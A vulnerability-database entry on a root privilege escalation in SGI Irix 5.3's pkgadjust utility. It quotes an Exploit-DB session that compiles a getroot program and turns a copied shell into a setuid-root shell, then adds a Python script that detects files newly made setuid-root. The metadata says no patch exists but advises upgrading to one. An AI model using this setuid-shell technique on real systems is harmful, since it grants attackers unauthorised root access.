Vendor: Irix
By: Unknown
CVSS: 7.5 (HIGH)
Privilege Escalation
CWE: 269
Product Name: Irix
Affected Version From: Irix 5.3
Affected Version To: Irix 5.3
Patch Exists: NO
Related CWE: Unknown
CPE: sgi:irix:5.3
Metasploit:
Other Scripts:
Platforms Tested: Unknown

pkgadjust utility vulnerability in Irix 5.3

The vulnerability in the pkgadjust utility allows an attacker to compromise the root account. By using a specially crafted program, the attacker can gain root privileges on the system.

Mitigation:

Upgrade to a patched version or apply vendor-supplied fix
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/419/info

A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. 

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh
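
The visible artifact of this session is the change between the two `ls -la` lines: the same file goes from owner hhui, mode -rwxr-xr-x, to owner root with the setuid bit set. The following is an added detection example, not part of the original advisory; it compares two `ls -la` snapshots and reports files that became setuid-root. The function names are hypothetical, and the input is assumed to contain entry lines only (no "total" line).

```python
# Added example: flag files that became setuid-root between two `ls -la` snapshots.
SPECIAL = {2: ("sS", 0o4000), 5: ("sS", 0o2000), 8: ("tT", 0o1000)}

# The two listing lines from the session above, reused as sample input.
BEFORE = ["-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh"]
AFTER = ["-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh"]


def parse_mode(mode):
    """Turn an ls mode string such as -rwsr-xr-x into numeric permission bits."""
    if len(mode) < 10:
        raise ValueError("short mode string: %r" % mode)
    bits = 0
    for i, ch in enumerate(mode[1:10]):
        letters, flag = SPECIAL.get(i, ("", 0))
        if ch == "rwx"[i % 3]:
            bits |= 1 << (8 - i)
        elif ch in letters:
            bits |= flag
            if ch.islower():  # s/t: the execute bit is set as well
                bits |= 1 << (8 - i)
        elif ch != "-":
            raise ValueError("bad mode character %r in %r" % (ch, mode))
    return bits


def parse_line(line):
    """Parse one `ls -la` entry into (name, is_regular_file, mode_bits, owner)."""
    f = line.split(None, 8)
    if len(f) < 9:
        raise ValueError("not an ls -la entry: %r" % line)
    return f[8], f[0][0] == "-", parse_mode(f[0]), f[2]


def is_suid_root(entry):
    _, regular, mode, owner = entry
    return regular and bool(mode & 0o4000) and owner == "root"


def gained_suid_root(before, after):
    """Return (name, old_owner, new_owner, new_mode) for files newly setuid-root."""
    old = {e[0]: e for e in map(parse_line, before)}
    findings = []
    for entry in map(parse_line, after):
        prev = old.get(entry[0])
        if is_suid_root(entry) and not (prev and is_suid_root(prev)):
            findings.append((entry[0], prev[3] if prev else None, entry[3], entry[2]))
    return findings


if __name__ == "__main__":
    for name, old_owner, new_owner, mode in gained_suid_root(BEFORE, AFTER):
        print("%s: owner %s -> %s, mode %04o" % (name, old_owner, new_owner, mode))
```

A file that is absent from the earlier snapshot but setuid-root in the later one is reported with an old owner of None.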